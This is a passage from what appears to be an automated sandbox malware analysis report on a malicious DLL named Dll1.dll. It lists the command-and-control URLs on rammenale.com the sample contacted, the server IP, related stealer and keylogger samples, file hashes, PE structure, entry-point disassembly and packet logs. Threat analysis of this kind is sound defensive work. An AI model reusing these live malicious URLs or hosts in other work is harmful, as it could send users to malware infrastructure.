          https://rammenale.com/for2/regit.tmpPRrundll32.exe, 00000009.00000002.3273671925.0000000002E80000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          https://rammenale.com/for2/aclog.txt&8rundll32.exe, 0000000B.00000002.3274796619.00000000088D0000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          https://rammenale.com/for2/aclog.txtC:rundll32.exe, 00000005.00000002.3272308201.0000000002670000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3273346372.00000000027E0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3272227188.0000000002610000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3273406270.00000000027A0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3272218090.0000000002AD0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3272399936.0000000002C30000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          https://rammenale.com/for2/aclogtxtHrundll32.exe, 00000006.00000002.3272073394.00000000002F7000.00000004.00000010.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          https://rammenale.com/for2/aclog.txt4errundll32.exe, 00000006.00000002.3274805413.0000000008499000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          https://rammenale.com/for2/regit.tmpYrundll32.exe, 0000000A.00000002.3274852987.0000000008D6B000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          https://rammenale.com/for2/regit.tmpentindowsINetCookiesrundll32.exe, 00000009.00000002.3272263359.0000000002C81000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.3272127824.0000000002EE0000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          https://rammenale.com/for2/aclog.txtftrundll32.exe, 00000006.00000002.3272227188.000000000261A000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          https://rammenale.com/for2/aclog.txtjxrundll32.exe, 00000005.00000002.3274732553.0000000008486000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          https://rammenale.com/for2/regit.tmpUrundll32.exe, 0000000C.00000002.3275204855.0000000009207000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          https://rammenale.com/for2/aclogtxtBrundll32.exe, 00000005.00000002.3272074755.0000000000247000.00000004.00000010.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          https://rammenale.com/for2/regit.tmpVrundll32.exe, 0000000A.00000002.3274852987.0000000008D82000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          https://rammenale.com/for2/regit.tmp4erundll32.exe, 00000009.00000002.3274905046.0000000008B02000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          https://rammenale.com/for2/aclog.txtmrundll32.exe, 00000006.00000002.3272227188.000000000261A000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          https://rammenale.com/for2/aclog.txtV~rundll32.exe, 0000000B.00000002.3272399936.0000000002CA9000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          https://rammenale.com/for2/aclogtxtrundll32.exe, 0000000B.00000002.3272070507.0000000002767000.00000004.00000010.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          https://rammenale.com/Sirundll32.exe, 0000000C.00000003.2370250074.000000000922D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3275553692.000000000922E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2369876959.000000000921F000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://rammenale.com/for2/regit.tmpGrundll32.exe, 00000009.00000002.3272263359.0000000002C1A000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          https://rammenale.com/for2/regit.tmpHrundll32.exe, 00000009.00000002.3272263359.0000000002C1A000.00000004.00000020.00020000.00000000.sdmpfalse
            		unknown
            https://rammenale.com/for2/aclog.txtsrundll32.exe, 00000005.00000002.3272220241.00000000023D0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3272306421.0000000002C10000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: malware
            		unknown
            https://rammenale.com/for2/regit.tmp5Arundll32.exe, 0000000C.00000002.3275204855.00000000091F3000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: malware
            		unknown
            https://rammenale.com/for2/aclog.txtrrundll32.exe, 0000000B.00000002.3272399936.0000000002CA9000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: malware
            		unknown
            https://rammenale.com/for2/aclog.txtprundll32.exe, 00000005.00000002.3272308201.00000000026E3000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: malware
            		unknown
            https://rammenale.com/for2/regit.tmpErundll32.exe, 0000000A.00000002.3274852987.0000000008D82000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: malware
            		unknown
            https://rammenale.com/for2/aclog.txtWkrundll32.exe, 00000005.00000002.3274732553.0000000008423000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: malware
            		unknown
            https://rammenale.com/for2/regit.tmp/rundll32.exe, 0000000C.00000003.2370250074.0000000009270000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3275553692.0000000009270000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: malware
            		unknown
            https://rammenale.com/for2/regit.tmp0rundll32.exe, 00000009.00000002.3274905046.0000000008B02000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.3274852987.0000000008D82000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2370250074.000000000922D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3275553692.000000000922E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2369876959.000000000921F000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: malware
            		unknown
            https://rammenale.com/for2/regit.tmpmprundll32.exe, 0000000A.00000002.3274852987.0000000008D82000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: malware
            		unknown
            https://rammenale.com/for2/regit.tmp2rundll32.exe, 00000009.00000002.3272263359.0000000002C81000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: malware
            		unknown
            https://rammenale.com/for2/aclog.txtzrundll32.exe, 00000005.00000002.3274732553.0000000008450000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3274732553.0000000008469000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3274805413.0000000008499000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3274805413.0000000008481000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3274796619.00000000088D0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3274796619.000000000891D000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: malware
            		unknown
            https://rammenale.com/for2/regit.tmpR0rundll32.exe, 0000000A.00000002.3272127824.0000000002E6A000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: malware
            		unknown
            https://rammenale.com/for2/regit.tmp4Trundll32.exe, 00000009.00000002.3274905046.0000000008B02000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: malware
            		unknown
            https://rammenale.com/for2/aclog.txtP;rundll32.exe, 0000000B.00000002.3274796619.00000000088D0000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: malware
            		unknown
            https://rammenale.com/for2/regit.tmp4Prundll32.exe, 0000000A.00000002.3274852987.0000000008D82000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: malware
            		unknown
            https://rammenale.com/Drundll32.exe, 00000009.00000002.3274905046.0000000008B02000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://rammenale.com/for2/regit.tmp4rundll32.exe, 0000000A.00000002.3274852987.0000000008D82000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2370250074.0000000009270000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2370250074.000000000922D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3275553692.0000000009270000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3275553692.000000000922E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2369876959.000000000921F000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: malware
            		unknown
            https://rammenale.com/1prundll32.exe, 0000000C.00000003.2370250074.000000000922D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3275553692.000000000922E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2369876959.000000000921F000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown

            World Map of Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public IPs

            IPDomainCountryFlagASNASN NameMalicious
            131.153.206.231
            		rammenale.comUnited States
            		19437SS-ASHUStrue

            General Information

            Joe Sandbox version:40.0.0 Tourmaline
            Analysis ID:1500782
            Start date and time:2024-08-28 22:45:04 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 4m 36s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:15
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:Dll1.dll
            Detection:MAL
            Classification:mal80.evad.winDLL@20/0@2/1
            EGA Information:
            • Successful, ratio: 50%
            HCA Information:
            • Successful, ratio: 95%
            • Number of executed functions: 21
            • Number of non-executed functions: 62
            Cookbook Comments:
            • Found application associated with file extension: .dll

            Warnings

            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
            • Execution Graph export aborted for target rundll32.exe, PID 7484 because there are no executed function
            • Execution Graph export aborted for target rundll32.exe, PID 7748 because there are no executed function
            • Not all processes where analyzed, report is missing behavior information
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • VT rate limit hit for: Dll1.dll

            Simulations

            Behavior and APIs

            TimeTypeDescription
            16:45:56API Interceptor2x Sleep call for process: rundll32.exe modified
            16:45:59API Interceptor1x Sleep call for process: loaddll32.exe modified

            Joe Sandbox View / Context

            IPs

            No context

            Domains

            No context

            ASNs

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            SS-ASHUShttps://blockchainsolution.netlify.app/Get hashmaliciousUnknownBrowse
            • 131.153.206.100
            http://blockdag-network-rectification.pages.dev/wallet/inputs.html/js/aes.jsGet hashmaliciousUnknownBrowse
            • 131.153.206.103
            [SUSPECTED SPAM] Your Delivery Has Been Delayed Due to an Address Issue.emlGet hashmaliciousUnknownBrowse
            • 131.153.100.38
            Bank Slip.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
            • 131.153.147.106
            Fatura20240617.exeGet hashmaliciousFormBookBrowse
            • 131.153.148.82
            0tkRwEewXq.exeGet hashmaliciousFormBookBrowse
            • 131.153.170.234
            CMgd5ZVG2N.elfGet hashmaliciousUnknownBrowse
            • 209.100.21.94
            CMV610942X6UI.exeGet hashmaliciousFormBookBrowse
            • 131.153.148.82
            fisher man.exeGet hashmaliciousFormBookBrowse
            • 131.153.170.234
            SHUYOU #U65b0#U6307#U4ee4 PO-2301010 03-07-2024.pdf.exeGet hashmaliciousFormBookBrowse
            • 131.153.165.35

            JA3 Fingerprints

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            37f463bf4616ecd445d4a1937da06e19file.exeGet hashmaliciousLummaC, VidarBrowse
            • 131.153.206.231
            x64_installer__v4.5.6.msiGet hashmaliciousUnknownBrowse
            • 131.153.206.231
            Ad#U043ebe_Activator.exeGet hashmaliciousLummaCBrowse
            • 131.153.206.231
            file.exeGet hashmaliciousMeduza StealerBrowse
            • 131.153.206.231
            file.exeGet hashmaliciousMeduza StealerBrowse
            • 131.153.206.231
            file.exeGet hashmaliciousLummaC, VidarBrowse
            • 131.153.206.231
            0eyaBVo6tq.msiGet hashmaliciousUnknownBrowse
            • 131.153.206.231
            2ANivMQUch.msiGet hashmaliciousUnknownBrowse
            • 131.153.206.231
            NmJ4sVw68P.msiGet hashmaliciousUnknownBrowse
            • 131.153.206.231
            7Mr3U9Zd5W.msiGet hashmaliciousUnknownBrowse
            • 131.153.206.231

            Dropped Files

            No context

            Created / dropped Files

            No created / dropped files found

            Static File Info

            General

            File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
            Entropy (8bit):6.546303018854267
            TrID:
            • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
            • Generic Win/DOS Executable (2004/3) 0.20%
            • DOS Executable Generic (2002/1) 0.20%
            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
            File name:Dll1.dll
            File size:147'968 bytes
            MD5:b14ef85a60ac71c669cc960bdf580144
            SHA1:08906644b0ef1ee6478c45a6e0dd28533a9efc29
            SHA256:861911e953e6fd0a015b3a91a7528a388a535c83f4b9a5cf7366b8209d2f00c3
            SHA512:568fd5856c2e3801d59d094429243b6e1649d3b519f8cad0feab2c6752d4158e30d305fe06a651788d7f4420d43886f5dfb4fb43da605f0a718711cb099059e9
            SSDEEP:3072:X3ri+nr4ciRGSuaHUCO25obTBhH5P1KCJN6hkf1GYn3:X3rv2RGPwUC5o3H5PVLln3
            TLSH:E8E36B06B480C072C56E29350574DA726B7FBD30DF64ADCF67980A7A9F702C1CF25A2A
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Nnx./.+./.+./.+.W.*./.+.W.*./.+.W.*./.+.W.*./.+./.+./.+...*./.+...*./.+.W.*./.+...*./.+...*./.+...*./.+...+./.+...*./.+Rich./.

            File Icon

            Icon Hash:7ae282899bbab082

            Static PE Info

            General

            Entrypoint:0x100031f9
            Entrypoint Section:.text
            Digitally signed:false
            Imagebase:0x10000000
            Subsystem:windows gui
            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
            Time Stamp:0x65C48BD4 [Thu Feb 8 08:07:48 2024 UTC]
            TLS Callbacks:
            CLR (.Net) Version:
            OS Version Major:6
            OS Version Minor:0
            File Version Major:6
            File Version Minor:0
            Subsystem Version Major:6
            Subsystem Version Minor:0
            Import Hash:2634f378ea222ed85ede1cf7f9951bae

            Entrypoint Preview

            Instruction
            push ebp
            mov ebp, esp
            cmp dword ptr [ebp+0Ch], 01h
            jne 00007F960CC3F0E7h
            call 00007F960CC3F2BBh
            push dword ptr [ebp+10h]
            push dword ptr [ebp+0Ch]
            push dword ptr [ebp+08h]
            call 00007F960CC3EF93h
            add esp, 0Ch
            pop ebp
            retn 000Ch
            int3
            int3
            int3
            int3
            push ecx
            lea ecx, dword ptr [esp+08h]
            sub ecx, eax
            and ecx, 0Fh
            add eax, ecx
            sbb ecx, ecx
            or eax, ecx
            pop ecx
            jmp 00007F960CC3F7BFh
            push ecx
            lea ecx, dword ptr [esp+08h]
            sub ecx, eax
            and ecx, 07h
            add eax, ecx
            sbb ecx, ecx
            or eax, ecx
            pop ecx
            jmp 00007F960CC3F7A9h
            push ebp
            mov ebp, esp
            push 00000000h
            call dword ptr [1001B05Ch]
            push dword ptr [ebp+08h]
            call dword ptr [1001B058h]
            push C0000409h
            call dword ptr [1001B060h]
            push eax
            call dword ptr [1001B030h]
            pop ebp
            ret
            push ebp
            mov ebp, esp
            sub esp, 00000324h
            push 00000017h
            call dword ptr [1001B064h]
            test eax, eax
            je 00007F960CC3F0E7h
            push 00000002h
            pop ecx
            int 29h
            mov dword ptr [10023B40h], eax
            mov dword ptr [10023B3Ch], ecx
            mov dword ptr [10023B38h], edx
            mov dword ptr [10023B34h], ebx
            mov dword ptr [10023B30h], esi
            mov dword ptr [10023B2Ch], edi
            mov word ptr [10023B58h], ss
            mov word ptr [10023B4Ch], cs
            mov word ptr [eax], es

            Data Directories

            NameVirtual AddressVirtual Size Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT0x226c00x50.rdata
            IMAGE_DIRECTORY_ENTRY_IMPORT0x227100x50.rdata
            IMAGE_DIRECTORY_ENTRY_RESOURCE0x250000x1b0.rsrc
            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
            IMAGE_DIRECTORY_ENTRY_BASERELOC0x260000x1334.reloc
            IMAGE_DIRECTORY_ENTRY_DEBUG0x215380x38.rdata
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x214780x40.rdata
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IAT0x1b0000x158.rdata
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

            Sections

            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
            .text0x10000x19aeb0x19c002ca2786cfbd723012a4c3c12a482da85False0.584619614684466data6.670313016672894IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            .rdata0x1b0000x7e7c0x8000ca93a188af9bf56b0a61b88270c14a95False0.460968017578125data5.309007267929745IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .data0x230000x14b80xc00f2a0c098370b0401f7c1ad1213cd52fbFalse0.15169270833333334data2.17074655225428IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            .rsrc0x250000x1b00x2004cb59beff4c248d5e23bc9d579cd8ecfFalse0.501953125data4.493775023695173IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .reloc0x260000x13340x14009869f1aab016ea21d38cce363484b1c7False0.7552734375data6.441486057307813IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

            Resources

            NameRVASizeTypeLanguageCountryZLIB Complexity
            RT_MANIFEST0x250600x14eXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminatorsEnglishUnited States0.6407185628742516

            Imports

            DLLImport
            ole32.dllCoCreateInstance, CoUninitialize, CoInitialize
            OLEAUT32.dllVariantClear, VariantInit, SysFreeString, SysAllocString
            KERNEL32.dllFreeLibrary, WriteConsoleW, SetEndOfFile, HeapReAlloc, HeapSize, CreateFileW, FlushFileBuffers, GetStringTypeW, SetStdHandle, GetProcessHeap, ExitProcess, ExpandEnvironmentStringsW, TerminateProcess, Sleep, CloseHandle, GetProcAddress, CreateProcessW, GetModuleHandleW, CopyFileW, GetEnvironmentVariableW, LocalFree, GetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, FreeEnvironmentStringsW, RtlUnwind, RaiseException, InterlockedFlushSList, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, DecodePointer, LoadLibraryExW, ReadFile, MoveFileExW, GetModuleHandleExW, GetModuleFileNameW, SetFilePointerEx, GetConsoleMode, ReadConsoleW, GetStdHandle, GetFileType, HeapFree, HeapAlloc, LCMapStringW, WriteFile, GetConsoleOutputCP, GetFileSizeEx, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW

            Exports

            NameOrdinalAddress
            mydllmain10x1000101b

            Possible Origin

            Language of compilation systemCountry where language is spokenMap
            EnglishUnited States

            Network Behavior

            Network Port Distribution

            TCP Packets

            TimestampSource PortDest PortSource IPDest IP
            Aug 28, 2024 22:45:55.143811941 CEST49704443192.168.2.5131.153.206.231
            Aug 28, 2024 22:45:55.143858910 CEST44349704131.153.206.231192.168.2.5
            Aug 28, 2024 22:45:55.143930912 CEST49704443192.168.2.5131.153.206.231
            Aug 28, 2024 22:45:55.145370960 CEST49705443192.168.2.5131.153.206.231
            Aug 28, 2024 22:45:55.145418882 CEST44349705131.153.206.231192.168.2.5
            Aug 28, 2024 22:45:55.145484924 CEST49705443192.168.2.5131.153.206.231
            Aug 28, 2024 22:45:55.156755924 CEST49704443192.168.2.5131.153.206.231
            Aug 28, 2024 22:45:55.156771898 CEST44349704131.153.206.231192.168.2.5
            Aug 28, 2024 22:45:55.157991886 CEST49705443192.168.2.5131.153.206.231
            Aug 28, 2024 22:45:55.158011913 CEST44349705131.153.206.231192.168.2.5
            Aug 28, 2024 22:45:56.078687906 CEST44349705131.153.206.231192.168.2.5
            Aug 28, 2024 22:45:56.078716993 CEST44349704131.153.206.231192.168.2.5
            Aug 28, 2024 22:45:56.078809977 CEST49704443192.168.2.5131.153.206.231
            Aug 28, 2024 22:45:56.078814030 CEST49705443192.168.2.5131.153.206.231
            Aug 28, 2024 22:45:56.078883886 CEST49704443192.168.2.5131.153.206.231
            Aug 28, 2024 22:45:56.865137100 CEST49705443192.168.2.5131.153.206.231
            Aug 28, 2024 22:45:56.865163088 CEST44349705131.153.206.231192.168.2.5
            Aug 28, 2024 22:45:56.865509987 CEST44349705131.153.206.231192.168.2.5
            Aug 28, 2024 22:45:56.865641117 CEST49705443192.168.2.5131.153.206.231
            Aug 28, 2024 22:45:56.871886015 CEST49704443192.168.2.5131.153.206.231
            Aug 28, 2024 22:45:56.871911049 CEST44349704131.153.206.231192.168.2.5
            Aug 28, 2024 22:45:56.872271061 CEST44349704131.153.206.231192.168.2.5
            Aug 28, 2024 22:45:56.872328997 CEST49704443192.168.2.5131.153.206.231
            Aug 28, 2024 22:45:56.902126074 CEST49705443192.168.2.5131.153.206.231
            Aug 28, 2024 22:45:56.948498964 CEST44349705131.153.206.231192.168.2.5
            Aug 28, 2024 22:45:56.953058004 CEST49704443192.168.2.5131.153.206.231
            Aug 28, 2024 22:45:57.000497103 CEST44349704131.153.206.231192.168.2.5
            Aug 28, 2024 22:45:57.120518923 CEST49708443192.168.2.5131.153.206.231
            Aug 28, 2024 22:45:57.120553017 CEST44349708131.153.206.231192.168.2.5
            Aug 28, 2024 22:45:57.120626926 CEST49708443192.168.2.5131.153.206.231
            Aug 28, 2024 22:45:57.129367113 CEST49708443192.168.2.5131.153.206.231
            Aug 28, 2024 22:45:57.129379034 CEST44349708131.153.206.231192.168.2.5
            Aug 28, 2024 22:45:57.148355961 CEST49709443192.168.2.5131.153.206.231
            Aug 28, 2024 22:45:57.148390055 CEST44349709131.153.206.231192.168.2.5
            Aug 28, 2024 22:45:57.148453951 CEST49709443192.168.2.5131.153.206.231
            Aug 28, 2024 22:45:57.161968946 CEST49709443192.168.2.5131.153.206.231
            Aug 28, 2024 22:45:57.161983967 CEST44349709131.153.206.231192.168.2.5
            Aug 28, 2024 22:45:57.240781069 CEST44349705131.153.206.231192.168.2.5
            Aug 28, 2024 22:45:57.240835905 CEST49705443192.168.2.5131.153.206.231
            Aug 28, 2024 22:45:57.240847111 CEST44349705131.153.206.231192.168.2.5
            Aug 28, 2024 22:45:57.240885973 CEST49705443192.168.2.5131.153.206.231
            Aug 28, 2024 22:45:57.240914106 CEST44349705131.153.206.231192.168.2.5
            Aug 28, 2024 22:45:57.240973949 CEST44349705131.153.206.231192.168.2.5
            Aug 28, 2024 22:45:57.241014957 CEST49705443192.168.2.5131.153.206.231
            Aug 28, 2024 22:45:57.242014885 CEST49705443192.168.2.5131.153.206.231
            Aug 28, 2024 22:45:57.242024899 CEST44349705131.153.206.231192.168.2.5
            Aug 28, 2024 22:45:57.242062092 CEST49705443192.168.2.5131.153.206.231
            Aug 28, 2024 22:45:57.242074966 CEST49705443192.168.2.5131.153.206.231
            Aug 28, 2024 22:45:57.288619995 CEST44349704131.153.206.231192.168.2.5
            Aug 28, 2024 22:45:57.288685083 CEST49704443192.168.2.5131.153.206.231
            Aug 28, 2024 22:45:57.288707972 CEST44349704131.153.206.231192.168.2.5
            Aug 28, 2024 22:45:57.288752079 CEST49704443192.168.2.5131.153.206.231
            Aug 28, 2024 22:45:57.288758039 CEST44349704131.153.206.231192.168.2.5
            Aug 28, 2024 22:45:57.288779974 CEST44349704131.153.206.231192.168.2.5
            Aug 28, 2024 22:45:57.288800955 CEST49704443192.168.2.5131.153.206.231
            Aug 28, 2024 22:45:57.288825035 CEST49704443192.168.2.5131.153.206.231
            Aug 28, 2024 22:45:57.289872885 CEST49704443192.168.2.5131.153.206.231
            Aug 28, 2024 22:45:57.289882898 CEST44349704131.153.206.231192.168.2.5
            Aug 28, 2024 22:45:57.289891958 CEST49704443192.168.2.5131.153.206.231
            Aug 28, 2024 22:45:57.290067911 CEST49704443192.168.2.5131.153.206.231
            Aug 28, 2024 22:45:57.722307920 CEST49711443192.168.2.5131.153.206.231
            Aug 28, 2024 22:45:57.722347021 CEST44349711131.153.206.231192.168.2.5
            Aug 28, 2024 22:45:57.722428083 CEST49711443192.168.2.5131.153.206.231
            Aug 28, 2024 22:45:57.730087996 CEST49711443192.168.2.5131.153.206.231
            Aug 28, 2024 22:45:57.730103970 CEST44349711131.153.206.231192.168.2.5
            Aug 28, 2024 22:45:58.098442078 CEST44349708131.153.206.231192.168.2.5
            Aug 28, 2024 22:45:58.098736048 CEST49708443192.168.2.5131.153.206.231
            Aug 28, 2024 22:45:58.102935076 CEST49708443192.168.2.5131.153.206.231
            Aug 28, 2024 22:45:58.102941990 CEST44349708131.153.206.231192.168.2.5
            Aug 28, 2024 22:45:58.103215933 CEST44349708131.153.206.231192.168.2.5
            Aug 28, 2024 22:45:58.103271008 CEST49708443192.168.2.5131.153.206.231
            Aug 28, 2024 22:45:58.105104923 CEST49708443192.168.2.5131.153.206.231
            Aug 28, 2024 22:45:58.105103970 CEST44349709131.153.206.231192.168.2.5
            Aug 28, 2024 22:45:58.105171919 CEST49709443192.168.2.5131.153.206.231
            Aug 28, 2024 22:45:58.109622002 CEST49709443192.168.2.5131.153.206.231
            Aug 28, 2024 22:45:58.109632969 CEST44349709131.153.206.231192.168.2.5
            Aug 28, 2024 22:45:58.109874010 CEST44349709131.153.206.231192.168.2.5
            Aug 28, 2024 22:45:58.110085011 CEST49709443192.168.2.5131.153.206.231
            Aug 28, 2024 22:45:58.111784935 CEST49709443192.168.2.5131.153.206.231
            Aug 28, 2024 22:45:58.152498007 CEST44349708131.153.206.231192.168.2.5
            Aug 28, 2024 22:45:58.152512074 CEST44349709131.153.206.231192.168.2.5
            Aug 28, 2024 22:45:58.620194912 CEST49712443192.168.2.5131.153.206.231
            Aug 28, 2024 22:45:58.620230913 CEST44349712131.153.206.231192.168.2.5
            Aug 28, 2024 22:45:58.620402098 CEST49712443192.168.2.5131.153.206.231
            Aug 28, 2024 22:45:58.631628036 CEST49712443192.168.2.5131.153.206.231
            Aug 28, 2024 22:45:58.631647110 CEST44349712131.153.206.231192.168.2.5
            Aug 28, 2024 22:45:58.701950073 CEST44349708131.153.206.231192.168.2.5
            Aug 28, 2024 22:45:58.702121019 CEST44349708131.153.206.231192.168.2.5
            Aug 28, 2024 22:45:58.702187061 CEST49708443192.168.2.5131.153.206.231
            Aug 28, 2024 22:45:58.703712940 CEST44349709131.153.206.231192.168.2.5
            Aug 28, 2024 22:45:58.703871012 CEST44349709131.153.206.231192.168.2.5
            Aug 28, 2024 22:45:58.703922033 CEST49709443192.168.2.5131.153.206.231
            Aug 28, 2024 22:45:58.706404924 CEST49708443192.168.2.5131.153.206.231
            Aug 28, 2024 22:45:58.706422091 CEST44349708131.153.206.231192.168.2.5
